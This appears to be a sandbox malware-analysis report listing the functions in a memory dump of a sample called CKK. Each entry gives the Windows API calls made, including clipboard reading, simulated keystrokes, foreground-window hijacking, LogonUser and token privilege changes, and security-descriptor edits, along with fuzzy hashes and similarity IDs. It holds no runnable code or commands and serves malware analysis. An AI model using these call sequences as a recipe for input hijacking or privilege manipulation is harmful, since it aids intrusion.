Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 28b244dd67ff127704f8df0ebbbc972a630853756fa46f29909129c266e4e41d
Instruction ID: cda148638167cfbc847c31be85aeeb27d335aafc3cccd36b2fd7ef4a6eedc754
Opcode Fuzzy Hash: 28b244dd67ff127704f8df0ebbbc972a630853756fa46f29909129c266e4e41d
Instruction Fuzzy Hash: DBE0CD7130424C07C608FB759852B7DF759DBD2356F40553EF746871A3CF2885464351

Uniqueness

Uniqueness Score: -1.00%

Function 001908E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 001908EB

Memory Dump Source

Source File: 00000003.00000002.798481679.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_CKK.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: b56048b1f4f79ce6928199f546885e1a99655e60a01f4491d38ff82d841d5c7c
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: BFE08C71A0520CEFEF25CBB88808AA977B8DB08320F104658E91AC3281D6308E40A694

Uniqueness

Uniqueness Score: -1.00%

Function 00A3039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00A30704,?,?,00000000), ref: 00A303B7

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 79756d167b1785e40f57f1a541b38463e4bfbf6ebbe94af902c47b3bda02916f
Instruction ID: e91a1a5e81d315d68d245d7de8933301fd295978f56641182220e2c4ed5b83f5
Opcode Fuzzy Hash: 79756d167b1785e40f57f1a541b38463e4bfbf6ebbe94af902c47b3bda02916f
Instruction Fuzzy Hash: 1AD06C3204010DBBDF028F84DD46EDA3FAAFB48714F014100BE1856020C732E822AB90

Uniqueness

Uniqueness Score: -1.00%

Function 001908B0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 001908BB

Memory Dump Source

Source File: 00000003.00000002.798481679.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_CKK.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: 26a6f1c3c698ae263438eba95d7c69ba28fd61c4b9687349bb249a44303876a7
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: 03D05E30E0620CABCB10CAA49804A9A73A89B08320F108754E91593280D63199409790

Uniqueness

Uniqueness Score: -1.00%

Function 009F1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32 ref: 009F1CBC

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 8616b395bdfd37aabe62197b7537252a6f70bc909770034762f0930e885a19bc
Instruction ID: 2f490de09ae98b9259f9014972b2bf5d4f1b7c35d5958c78a4a927bf5414d9e6
Opcode Fuzzy Hash: 8616b395bdfd37aabe62197b7537252a6f70bc909770034762f0930e885a19bc
Instruction Fuzzy Hash: 92C09B353C03049FF614D7C0BC4EF117754A348B14F054001F609595E3C3F11412DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A6744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 009F5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 009F5773

GetLastError.KERNEL32(00000002,00000000), ref: 00A676DE

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: c063d1aa3e4ea98a87261d13fbb28154b805056ce434c235f5fad910e6e4cbec
Instruction ID: d1252330b843364f3a972c5e2b7506bc92471f685a636c7873477c77548e0b43
Opcode Fuzzy Hash: c063d1aa3e4ea98a87261d13fbb28154b805056ce434c235f5fad910e6e4cbec
Instruction Fuzzy Hash: E8818D302087059FCB14EF28C491BADB7F1BF88358F04456DF9965B2A2DB70AD45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A0FC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00A0FD1F

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: e028ca0476b779cd2626489eb5d22ed081a42c10320d9176236d050da73be0bd
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 7631E474A0010D9FD728CF59E491969F7B2FF49304B2486A5E809EBA95D731EDC1CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 0019232C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00192341

Memory Dump Source

Source File: 00000003.00000002.798481679.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_CKK.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: b955721a6cde49eb2306d8df2a1098f1b9224b6701687e33a82b52c28653f38f
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: DFE09A7594010DAFDB00EFA4D5496AE7BB4EF04301F1005A1FD0596680DB309A548A62

Uniqueness

Uniqueness Score: -1.00%

Function 00192330 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00192341

Memory Dump Source

Source File: 00000003.00000002.798481679.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_CKK.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: c29648b1dd2abb29c3d2e8d23dce0ec52ca7f83a4c2bd17f95cac8ea96329c83
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: E1E0E67594010DEFDB00EFB4D5496AE7FB4FF04301F100561FD05D2280D7309E508A62

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A89576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00A09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A09BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00A8961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A8965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00A8969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A896C9
SendMessageW.USER32 ref: 00A896F2
GetKeyState.USER32(00000011), ref: 00A8978B
GetKeyState.USER32(00000009), ref: 00A89798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A897AE
GetKeyState.USER32(00000010), ref: 00A897B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A897E9
SendMessageW.USER32 ref: 00A89810
SendMessageW.USER32(?,00001030,?,00A87E95), ref: 00A89918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00A8992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00A89941
SetCapture.USER32(?), ref: 00A8994A
ClientToScreen.USER32(?,?), ref: 00A899AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00A899BC
InvalidateRect.USER32(?,00000000,00000001), ref: 00A899D6
ReleaseCapture.USER32 ref: 00A899E1
GetCursorPos.USER32(?), ref: 00A89A19
ScreenToClient.USER32(?,?), ref: 00A89A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00A89A80
SendMessageW.USER32 ref: 00A89AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00A89AEB
SendMessageW.USER32 ref: 00A89B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00A89B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00A89B4A
GetCursorPos.USER32(?), ref: 00A89B68
ScreenToClient.USER32(?,?), ref: 00A89B75
GetParent.USER32(?), ref: 00A89B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00A89BFA
SendMessageW.USER32 ref: 00A89C2B
ClientToScreen.USER32(?,?), ref: 00A89C84
TrackPopupMenuEx.USER32 ref: 00A89CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00A89CDE
SendMessageW.USER32 ref: 00A89D01
ClientToScreen.USER32(?,?), ref: 00A89D4E
TrackPopupMenuEx.USER32 ref: 00A89D82

Part of subcall function 00A09944: GetWindowLongW.USER32(?,000000EB), ref: 00A09952

GetWindowLongW.USER32(?,000000F0), ref: 00A89E05

Strings

F, xrefs: 00A89D07
@GUI_DRAGID, xrefs: 00A8997D

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F
API String ID: 3429851547-4164748364
Opcode ID: b384032b3ba3db5f68a6322615347a0c7b2fed267a52ec5d94ca778b366e4221
Instruction ID: 3ca38039f8c9ec5f92ac94701f4a0812f2968171877d501939a2b764a3942cbc
Opcode Fuzzy Hash: b384032b3ba3db5f68a6322615347a0c7b2fed267a52ec5d94ca778b366e4221
Instruction Fuzzy Hash: 6D426A74204201AFDB25EF68CC44EBBBBE5FF49320F180629F699872A1E731A855CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A84873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00A848F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00A84908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00A84927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00A8494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00A8495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00A8497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00A849AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00A849D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00A84A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00A84A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00A84A7E
IsMenu.USER32(?), ref: 00A84A97
GetMenuItemInfoW.USER32 ref: 00A84AF2
GetMenuItemInfoW.USER32 ref: 00A84B20
GetWindowLongW.USER32(?,000000F0), ref: 00A84B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00A84BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00A84C82
wsprintfW.USER32 ref: 00A84CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A84CC9
GetWindowTextW.USER32 ref: 00A84CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00A84D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A84D33
GetWindowTextW.USER32 ref: 00A84D5A

Strings

%d/%02d/%02d, xrefs: 00A84CA8

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: 56219befacbdfb7239bef6f913b80bb02f3a30ccf3d6064cfc7f9c6bd19e3eab
Instruction ID: 0a405aec395745a7a4a8363e2c97e63308a4a254f4c331a48ef5f49178a750b6
Opcode Fuzzy Hash: 56219befacbdfb7239bef6f913b80bb02f3a30ccf3d6064cfc7f9c6bd19e3eab
Instruction Fuzzy Hash: 8E12F37160025AABEB24AF68CC49FAE7BF8EF89710F104129F515EB2E1D7789941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00A0F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00A0F998
FindWindowW.USER32 ref: 00A4F474
IsIconic.USER32(00000000), ref: 00A4F47D
ShowWindow.USER32(00000000,00000009), ref: 00A4F48A
SetForegroundWindow.USER32(00000000), ref: 00A4F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A4F4AA
GetCurrentThreadId.KERNEL32 ref: 00A4F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A4F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 00A4F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 00A4F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00A4F4DE
SetForegroundWindow.USER32(00000000), ref: 00A4F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 00A4F4F6
keybd_event.USER32 ref: 00A4F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 00A4F50B
keybd_event.USER32 ref: 00A4F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 00A4F519
keybd_event.USER32 ref: 00A4F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 00A4F528
keybd_event.USER32 ref: 00A4F52D
SetForegroundWindow.USER32(00000000), ref: 00A4F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 00A4F557

Strings

Shell_TrayWnd, xrefs: 00A4F46F

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 9ea7d5d5fdd159a066aa97f2828e0f5f3969dff58fd2910b2046fe7397e62e00
Instruction ID: 20d849b550b718b9d44c3a6e3f15bcdf58e09686bbd03e47cc5f25ba9a35318b
Opcode Fuzzy Hash: 9ea7d5d5fdd159a066aa97f2828e0f5f3969dff58fd2910b2046fe7397e62e00
Instruction Fuzzy Hash: 9C315075A80218BEEB20ABF55C4AFBF7E6CEB84B60F101025F601E61D1D6B05901AF71

Uniqueness

Uniqueness Score: -1.00%

Function 00A51201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00A516C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A5170D
Part of subcall function 00A516C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A5173A
Part of subcall function 00A516C3: GetLastError.KERNEL32 ref: 00A5174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00A51286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00A512A8
CloseHandle.KERNEL32(?), ref: 00A512B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00A512D1
GetProcessWindowStation.USER32 ref: 00A512EA
SetProcessWindowStation.USER32 ref: 00A512F4
OpenDesktopW.USER32 ref: 00A51310

Part of subcall function 00A510BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A511FC), ref: 00A510D4
Part of subcall function 00A510BF: CloseHandle.KERNEL32(?), ref: 00A510E9

Strings

winsta0, xrefs: 00A512CC
, xrefs: 00A5125A
default, xrefs: 00A5130B

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: fc82ea6fc5f90c24bdfe214df5fe5a83fdf1d2815395e6e2c66a8f03778291a2
Instruction ID: 3c293ee88df98860e6f0c09f0308f45452f6d2c18fc2137ba82ef0d2d88de236
Opcode Fuzzy Hash: fc82ea6fc5f90c24bdfe214df5fe5a83fdf1d2815395e6e2c66a8f03778291a2
Instruction Fuzzy Hash: FB8177B1A00209ABDF21DFA4DD49FFE7BB9FF08715F145129F911A62A0D7748A49CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00A50B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A510F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A51114
Part of subcall function 00A510F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00A50B9B,?,?,?), ref: 00A51120
Part of subcall function 00A510F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A50B9B,?,?,?), ref: 00A5112F
Part of subcall function 00A510F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A50B9B,?,?,?), ref: 00A51136
Part of subcall function 00A510F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A5114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A50BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A50C00
GetLengthSid.ADVAPI32(?), ref: 00A50C17
GetAce.ADVAPI32(?,00000000,?), ref: 00A50C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A50C6D
GetLengthSid.ADVAPI32(?), ref: 00A50C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00A50C8C
HeapAlloc.KERNEL32(00000000), ref: 00A50C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A50CB4
CopySid.ADVAPI32(00000000), ref: 00A50CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A50CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A50D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A50D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A50D45
HeapFree.KERNEL32(00000000), ref: 00A50D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A50D55
HeapFree.KERNEL32(00000000), ref: 00A50D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A50D65
HeapFree.KERNEL32(00000000), ref: 00A50D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00A50D78
HeapFree.KERNEL32(00000000), ref: 00A50D7F

Part of subcall function 00A51193: GetProcessHeap.KERNEL32(00000008,00A50BB1,?,00000000,?,00A50BB1,?), ref: 00A511A1
Part of subcall function 00A51193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00A50BB1,?), ref: 00A511A8
Part of subcall function 00A51193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00A50BB1,?), ref: 00A511B7

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 603891eb3b23a7783f25b8394d83055552d54548d899c94deac58d743562ddff
Instruction ID: 8b4bf260c8f18bbde0982753e0c89ed3ece9a82f438b56ab6189cc9aba592eb2
Opcode Fuzzy Hash: 603891eb3b23a7783f25b8394d83055552d54548d899c94deac58d743562ddff
Instruction Fuzzy Hash: FD71497290021AABDF10DFE4EC88FEEBBB8BF05351F144615ED15A6191D771A90ACF60

Uniqueness

Uniqueness Score: -1.00%

Function 00A6EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00A8CC08), ref: 00A6EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 00A6EB37
GetClipboardData.USER32 ref: 00A6EB43
CloseClipboard.USER32 ref: 00A6EB4F
GlobalLock.KERNEL32 ref: 00A6EB87
CloseClipboard.USER32 ref: 00A6EB91
GlobalUnlock.KERNEL32(00000000,00000000), ref: 00A6EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 00A6EBC9
GetClipboardData.USER32 ref: 00A6EBD1
GlobalLock.KERNEL32 ref: 00A6EBE2
GlobalUnlock.KERNEL32(00000000,?), ref: 00A6EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 00A6EC38
GetClipboardData.USER32 ref: 00A6EC44
GlobalLock.KERNEL32 ref: 00A6EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00A6EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00A6EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00A6ECD2
GlobalUnlock.KERNEL32(00000000,?,?), ref: 00A6ECF3
CountClipboardFormats.USER32 ref: 00A6ED14
CloseClipboard.USER32 ref: 00A6ED59

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
